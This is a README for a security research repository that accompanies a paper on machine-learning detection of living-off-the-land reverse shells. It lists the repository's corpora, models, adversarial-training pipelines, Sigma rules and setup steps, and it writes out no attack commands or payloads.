This repository accompanies the paper:
“Robust Synthetic Data-Driven Detection of Living-Off-the-Land Reverse Shells”
It contains:
- a curated corpus of benign and malicious shell commands,
- data-augmentation and adversarial-example generators,
- a library of detection models (traditional ML, CNN/LSTM, Transformer, XGBoost, one-class),
- ablation studies on embedding size, dropout, tokenizer choice, and more,
- full adversarial-training, evasion, and poisoning pipelines,
- notebooks that reproduce every table and figure in the paper.
The overarching goal is to build detectors that remain robust when attackers hide reverse shells inside otherwise benign one-liner commands.
- Pre-trained models: https://huggingface.co/dtrizna/QuasarNix
- Dataset: https://huggingface.co/datasets/dtrizna/QuasarNix
If you build on this work, please cite the paper:
@misc{trizna2024robustsyntheticdatadrivendetection,
title={Robust Synthetic Data-Driven Detection of Living-Off-the-Land Reverse Shells},
author={Dmitrijs Trizna and Luca Demetrio and Battista Biggio and Fabio Roli},
year={2024},
eprint={2402.18329},
archivePrefix={arXiv},
primaryClass={cs.CR},
url={https://arxiv.org/abs/2402.18329},
}-
src/Core library
•augmentation.py– rule-based and generative augmentations
•evasion.py– white-box / black-box adversarial attacks
•models.py– model definitions (CNN, LSTM, Transformer, XGBoost, …)
•preprocessors.py,bpe/,tabular_utils.py– tokenisers & feature builders -
experiments/Scripts and notebooks used in the paper
•ablation_*.py– ablation studies
•adversarial_*.py– attack and defence pipelines
•train_release_models.py– end-to-end training script
•logs_*/– TensorBoard runs, CSV metrics, and model checkpoints -
data/Signatures, sample datasets
•signatures/– Sigma rules generated by our evolutionary search
•nix_shell/,powershell/– raw command corpora -
img/Plots ready for publication.
- Create an isolated environment:
uv venv # creates a .venv directory (add --python 3.11 to choose a specific interpreter)
source .venv/bin/activate- Install all project dependencies declared in
pyproject.toml:
uv sync # reads dependencies from pyproject.toml and installs them